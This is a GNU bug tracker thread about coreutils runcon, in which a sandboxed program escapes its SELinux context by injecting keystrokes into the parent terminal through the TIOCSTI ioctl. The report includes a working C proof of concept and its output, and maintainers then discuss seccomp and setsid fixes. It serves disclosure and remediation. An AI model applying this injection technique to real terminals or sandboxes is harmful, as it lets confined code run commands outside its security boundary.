GNU bug report logs -
#24541
runcon tty hijacking via TIOCSTI ioctl
Previous Next
Reported by: up201407890 <at> alunos.dcc.fc.up.pt
Date: Sun, 25 Sep 2016 15:58:02 UTC
Severity: normal
Done: Paul Eggert <eggert <at> cs.ucla.edu>
Bug is archived. No further changes may be made.
To add a comment to this bug, you must first unarchive it, by sending
a message to control AT debbugs.gnu.org, with unarchive 24541 in the body.
You can then email your comments to 24541 AT debbugs.gnu.org in the normal way.
Toggle the display of automated, internal messages from the tracker.
Report forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Sun, 25 Sep 2016 15:58:02 GMT)
Full text and
rfc822 format available.
Acknowledgement sent
to
up201407890 <at> alunos.dcc.fc.up.pt:
New bug report received and forwarded. Copy sent to
bug-coreutils <at> gnu.org.
(Sun, 25 Sep 2016 15:58:02 GMT)
Full text and
rfc822 format available.
Message #5 received at submit <at> debbugs.gnu.org (full text, mbox):
When executing a program via the runcon utility, the nonpriv session
can escape to the parent session by using the TIOCSTI ioctl to push
characters into the terminal's input buffer, allowing an attacker to
execute arbitrary commands without the SELinux security context.
$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>
int main()
{
char *cmd = "id\n";
while(*cmd)
ioctl(0, TIOCSTI, cmd++);
execlp("/bin/id", "id", NULL);
}
$ gcc test.c -o test
$ runcon -t sandbox_t ./test
id
uid=1000 gid=1000 groups=1000
context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
$ id <--- did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
Thanks,
Federico Bento.
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Sun, 25 Sep 2016 18:50:02 GMT)
Full text and
rfc822 format available.
Message #8 received at 24541 <at> debbugs.gnu.org (full text, mbox):
[Message part 1 (text/plain, inline)]
up201407890 <at> alunos.dcc.fc.up.pt wrote re <http://bugs.gnu.org/24541>:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
Thanks for the bug report. Surely this is a bug in the setexeccon system call,
not in the runcon command that uses the system call. That being said, perhaps
runcon should work around the bug via something like the attached patch.
[runcon.diff (text/x-diff, attachment)]
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Mon, 26 Sep 2016 10:17:02 GMT)
Full text and
rfc822 format available.
Message #11 received at submit <at> debbugs.gnu.org (full text, mbox):
On 25/09/16 12:39, up201407890 <at> alunos.dcc.fc.up.pt wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
> char *cmd = "id\n";
> while(*cmd)
> ioctl(0, TIOCSTI, cmd++);
> execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
There are side effects to that though like not being able to background tasks etc.?
There collection of links on the issue at https://bugs.debian.org/816320
If setsid was an option, one could use `runcon ... setsid the_command`
though that would be less secure operation by default.
The same issue impacts chroot(1) somewhat also.
I'm not sure of the best fix here.
Pádraig
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Mon, 26 Sep 2016 10:19:02 GMT)
Full text and
rfc822 format available.
Message #14 received at 24541 <at> debbugs.gnu.org (full text, mbox):
On 25/09/16 12:39, up201407890 <at> alunos.dcc.fc.up.pt wrote:
> When executing a program via the runcon utility, the nonpriv session
> can escape to the parent session by using the TIOCSTI ioctl to push
> characters into the terminal's input buffer, allowing an attacker to
> execute arbitrary commands without the SELinux security context.
>
> $ cat test.c
> #include <unistd.h>
> #include <sys/ioctl.h>
>
> int main()
> {
> char *cmd = "id\n";
> while(*cmd)
> ioctl(0, TIOCSTI, cmd++);
> execlp("/bin/id", "id", NULL);
> }
> $ gcc test.c -o test
> $ runcon -t sandbox_t ./test
> id
> uid=1000 gid=1000 groups=1000
> context=unconfined_u:unconfined_r:sandbox_t:s0-s0:c0.c1023
> $ id <--- did not type this
> uid=1000(saken) gid=1000(saken) groups=1000(saken)
> context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
>
> This issue has been recently patched in the SELinux sandbox (CVE-2016-7545):
> https://github.com/SELinuxProject/selinux/commit/acca96a135a4d2a028ba9b636886af99c0915379
There are side effects to that though like not being able to background tasks etc.?
There collection of links on the issue at https://bugs.debian.org/816320
If setsid was an option, one could use `runcon ... setsid the_command`
though that would be less secure operation by default.
The same issue impacts chroot(1) somewhat also.
I'm not sure of the best fix here.
thanks,
Pádraig
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Mon, 26 Sep 2016 15:13:02 GMT)
Full text and
rfc822 format available.
Message #17 received at 24541 <at> debbugs.gnu.org (full text, mbox):
Quoting "Paul Eggert" <eggert <at> cs.ucla.edu>:
Hello,
I set the bug report here before I got a response from Paul Moore
https://marc.info/?l=selinux&m=147481004710264&w=2
"I don't think we need to fix this for runcon, as it isn't as
sandboxing tool like sandbox, and the loss of job control would likely
be much more noticeable for runcon."
> up201407890 <at> alunos.dcc.fc.up.pt wrote re <http://bugs.gnu.org/24541>:
>> When executing a program via the runcon utility, the nonpriv session
>> can escape to the parent session by using the TIOCSTI ioctl to push
>> characters into the terminal's input buffer, allowing an attacker to
>> execute arbitrary commands without the SELinux security context.
>
> Thanks for the bug report. Surely this is a bug in the setexeccon
> system call, not in the runcon command that uses the system call.
> That being said, perhaps runcon should work around the bug via
> something like the attached patch.
>
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
Reply sent
to
Paul Eggert <eggert <at> cs.ucla.edu>:
You have taken responsibility.
(Mon, 26 Sep 2016 15:54:02 GMT)
Full text and
rfc822 format available.
Notification sent
to
up201407890 <at> alunos.dcc.fc.up.pt:
bug acknowledged by developer.
(Mon, 26 Sep 2016 15:54:02 GMT)
Full text and
rfc822 format available.
Message #22 received at 24541-done <at> debbugs.gnu.org (full text, mbox):
> "I don't think we need to fix this for runcon, as it isn't as
> sandboxing tool like sandbox, and the loss of job control would likely
> be much more noticeable for runcon."
Thanks, closing the debbugs bug report.
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Thu, 29 Sep 2016 15:17:02 GMT)
Full text and
rfc822 format available.
Message #25 received at 24541 <at> debbugs.gnu.org (full text, mbox):
On 09/26/2016 05:53 PM, Paul Eggert wrote:
>> "I don't think we need to fix this for runcon, as it isn't as
>> sandboxing tool like sandbox, and the loss of job control would likely
>> be much more noticeable for runcon."
>
> Thanks, closing the debbugs bug report.
FWIW Karel just committed a workaround for su/runuser in util-linux
using libseccomp:
https://github.com/karelzak/util-linux/commit/8e4925016875c6a4f2ab4f833ba66f0fc57396a2
Have a nice day,
Berny
bug archived.
Request was from
Debbugs Internal Request <help-debbugs <at> gnu.org>
to
internal_control <at> debbugs.gnu.org.
(Fri, 28 Oct 2016 11:24:03 GMT)
Full text and
rfc822 format available.
bug unarchived.
Request was from
Pádraig Brady <P <at> draigBrady.com>
to
control <at> debbugs.gnu.org.
(Mon, 28 Aug 2017 09:43:02 GMT)
Full text and
rfc822 format available.
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Mon, 28 Aug 2017 09:52:02 GMT)
Full text and
rfc822 format available.
Message #32 received at 24541-done <at> debbugs.gnu.org (full text, mbox):
[Message part 1 (text/plain, inline)]
On 29/09/16 08:15, Bernhard Voelker wrote:
> On 09/26/2016 05:53 PM, Paul Eggert wrote:
>>> "I don't think we need to fix this for runcon, as it isn't as
>>> sandboxing tool like sandbox, and the loss of job control would likely
>>> be much more noticeable for runcon."
>>
>> Thanks, closing the debbugs bug report.
>
> FWIW Karel just committed a workaround for su/runuser in util-linux
> using libseccomp:
>
> https://github.com/karelzak/util-linux/commit/8e492501
I think this issue is worth addressing with libseccomp.
That lib is a widely used dependency on SELinux systems
so not a significant dependency to add.
The attached uses libseccomp if available,
and falls back to using setsid() in the edge cases where not.
cheers,
Pádraig
[runcon-inject.patch (text/x-patch, attachment)]
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Mon, 28 Aug 2017 11:25:02 GMT)
Full text and
rfc822 format available.
Message #35 received at submit <at> debbugs.gnu.org (full text, mbox):
On Monday, August 28, 2017 11:51:12 AM CEST Pádraig Brady wrote:
> On 29/09/16 08:15, Bernhard Voelker wrote:
> > On 09/26/2016 05:53 PM, Paul Eggert wrote:
> >>> "I don't think we need to fix this for runcon, as it isn't as
> >>> sandboxing tool like sandbox, and the loss of job control would likely
> >>> be much more noticeable for runcon."
> >>
> >> Thanks, closing the debbugs bug report.
> >
> > FWIW Karel just committed a workaround for su/runuser in util-linux
> > using libseccomp:
> >
> > https://github.com/karelzak/util-linux/commit/8e492501
Note that the above mentioned commit was reverted long time ago:
https://github.com/karelzak/util-linux/commit/23f75093
Kamil
> I think this issue is worth addressing with libseccomp.
> That lib is a widely used dependency on SELinux systems
> so not a significant dependency to add.
> The attached uses libseccomp if available,
> and falls back to using setsid() in the edge cases where not.
>
> cheers,
> Pádraig
Information forwarded
to
bug-coreutils <at> gnu.org:
bug#24541; Package
coreutils.
(Mon, 28 Aug 2017 11:25:02 GMT)
Full text and
rfc822 format available.
bug archived.
Request was from
Debbugs Internal Request <help-debbugs <at> gnu.org>
to
internal_control <at> debbugs.gnu.org.
(Tue, 26 Sep 2017 11:24:03 GMT)
Full text and
rfc822 format available.
This bug report was last modified 6 years and 213 days ago.
Previous Next
GNU bug tracking system
Copyright (C) 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson.